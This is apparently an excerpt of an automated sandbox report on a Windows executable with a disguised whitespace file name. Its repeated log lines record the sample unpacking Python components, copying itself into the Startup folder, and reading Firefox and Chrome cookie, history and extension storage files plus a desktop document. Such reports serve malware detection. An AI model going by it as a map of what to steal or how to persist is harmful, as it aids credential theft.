              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \System\Antivirus.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
